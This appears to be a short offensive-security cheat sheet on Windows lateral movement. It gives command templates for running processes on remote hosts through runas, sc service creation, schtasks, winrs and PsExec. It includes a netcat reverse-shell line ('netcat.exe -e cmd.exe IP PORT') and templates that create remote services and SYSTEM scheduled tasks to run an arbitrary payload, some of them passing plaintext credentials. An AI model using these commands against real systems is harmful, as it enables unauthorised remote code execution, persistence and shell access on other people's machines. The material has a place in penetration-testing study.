Skip to main content

Spawning Processes Remotely

Required Privileges: Administrators

Windows Services can also be leveraged to run arbitrary commands since they execute a command when started. While a Service executable is technically different from a Regular Application, if we configure a Windows Service to run any application, it will still execute it and Fail Afterwards.

We can create a Service on a Remote Host with sc which is a Standard Tool available in Windows. When using sc, it will try to connect to the Service Control Manager (SVCCTL) Remote Service Program through RPC.


Running as Another User

Runas Allows a User to run specific tools and programs with Different Permissions than the User's current logon provides.

:: Spawning a Shell as [Another User] [Running Commands as the Other User]
runas /netonly /user:DOMAIN\USERNAME "C:\netcat.exe -e cmd.exe IP PORT"

Creating Services

:: Create a Remote Service
sc \\TARGET create SERVICE_NAME binPath= "Command/PAYLOAD To Run" start= auto
:: Start - Stop - Delete
sc \\TARGET start "SERVICE_NAME"
sc \\TARGET stop "SERVICE_NAME"
sc \\TARGET delete "SERVICE_NAME"

Creating Scheduled Tasks

:: Create
schtasks /s TARGET /RU "SYSTEM" /create /tn "TASK_NAME" /tr "Command/PAYLOAD To Run" /sc ONCE /sd 01/01/2024 /st 00:00

:: Run
schtasks /s TARGET /run /TN "TASK_NAME"

:: List Tasks
tasklist /v

:: Delete Tasks
schtasks /s TARGET /TN "TASK_NAME" /DELETE /F

Remote Process Creation Using WinRM

Required Group Memberships: Remote Management Users

Windows Remote Management (WinRM) is a Web-Based Protocol used to send Powershell Commands to Windows Hosts remotely. Most Windows Server Installations will have WinRM enabled by Default.

:: Create Interactive Session
winrs -u:USERNAME -p:PASSWORD -r:TARGET cmd


PsExec

Required Privileges: Administrators

Allows an Administrator User to run Commands Remotely on any PC where he has Access.

:: Accept the [Eula] otherwise the Command won't Work
PsExec64.exe -accepteula
PsExec64.exe \\TARGET_IP -u USERNAME -p PASSWORD -i cmd.exe